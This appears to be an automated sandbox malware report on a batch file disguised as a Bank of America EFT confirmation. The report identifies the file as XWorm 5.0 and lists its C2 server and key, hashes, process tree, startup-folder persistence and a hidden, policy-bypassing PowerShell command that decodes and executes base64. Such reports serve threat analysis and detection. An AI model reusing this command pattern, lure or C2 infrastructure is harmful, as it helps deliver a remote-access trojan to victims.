Analysis

  max time kernel:   142s
  max time network:  147s
  platform:          windows10-2004_x64
  resource:          win10v2004-20250217-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         01/03/2025, 00:35

  Static task:       static1
  Behavioral task:   behavioral1
  Sample:            Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
  Resource:          win7-20240903-en
General

  Target:   Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
  Size:     62KB
  MD5:      4e49fd9891d84a4dff53559ce3fb1e4c
  SHA1:     6b44eb8513213887a7cf7a21a2ef75472fb32bcf
  SHA256:   6036593430cc74f68abc87c13469083968dc94f011d12c50c845c1a44751e409
  SHA512:   feced2549a5da4ab69077b37a9cbf88824edc010cd8163025556c8c0c810b7599c1f982556bc613fa1cceee6467f2d89ad72ae467346546e4f848a4b62db2626
  SSDEEP:   1536:5ImZkbmEKUgXEXzICKUnFCtb4+tD3Ezpaljp228c+:5I3Hfctb4UD3EzpVBc+
Malware Config

  Extracted family:  xworm
  Version:           5.0
  C2:                xinclas.vmcentra.top:2829
  DX77uB6mg61Bv7eW
  install_file:      USB.exe
Signatures

  Detect Xworm Payload (1 IoC)
    resource                                                                      yara_rule
    behavioral2/memory/2772-21-0x0000016E64200000-0x0000016E6420E000-memory.dmp   family_xworm

  Xworm family

  Blocklisted process makes network request (15 IoCs)
    flow   pid    Process
    22     2772   powershell.exe
    28     2772   powershell.exe
    31     2772   powershell.exe
    54     2772   powershell.exe
    56     2772   powershell.exe
    57     2772   powershell.exe
    62     2772   powershell.exe
    67     2772   powershell.exe
    70     2772   powershell.exe
    71     2772   powershell.exe
    72     2772   powershell.exe
    73     2772   powershell.exe
    74     2772   powershell.exe
    75     2772   powershell.exe
    76     2772   powershell.exe

  Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
    Run PowerShell and hide display window.
    pid    Process
    2772   powershell.exe

  Drops startup file (2 IoCs)
    description                   ioc                                                                                                      Process
    File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c3c73813.cmd   powershell.exe
    File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c3c73813.cmd   powershell.exe

  Suspicious behavior: EnumeratesProcesses (2 IoCs)
    pid    Process
    2772   powershell.exe
    2772   powershell.exe

  Suspicious use of AdjustPrivilegeToken (1 IoC)
    description               pid    Process
    Token: SeDebugPrivilege   2772   powershell.exe

  Suspicious use of WriteProcessMemory (4 IoCs)
    description                         pid    Process   procid_target
    PID 1704 wrote to memory of 3908    1704   cmd.exe   89
    PID 1704 wrote to memory of 3908    1704   cmd.exe   89
    PID 3908 wrote to memory of 2772    3908   cmd.exe   91
    PID 3908 wrote to memory of 2772    3908   cmd.exe   91
Processes

  1. C:\Windows\system32\cmd.exe
     Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
     PID: 1704
     - Suspicious use of WriteProcessMemory

     2. C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"
        PID: 3908
        - Suspicious use of WriteProcessMemory

        3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
           Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
           PID: 2772
           - Blocklisted process makes network request
           - Command and Scripting Interpreter: PowerShell
           - Drops startup file
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

  File 1
    Filesize:  60B
    MD5:       d17fe0a3f47be24a6453e9ef58c94641
    SHA1:      6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256:    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512:    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  File 2
    Filesize:  62KB
    MD5:       4e49fd9891d84a4dff53559ce3fb1e4c
    SHA1:      6b44eb8513213887a7cf7a21a2ef75472fb32bcf
    SHA256:    6036593430cc74f68abc87c13469083968dc94f011d12c50c845c1a44751e409
    SHA512:    feced2549a5da4ab69077b37a9cbf88824edc010cd8163025556c8c0c810b7599c1f982556bc613fa1cceee6467f2d89ad72ae467346546e4f848a4b62db2626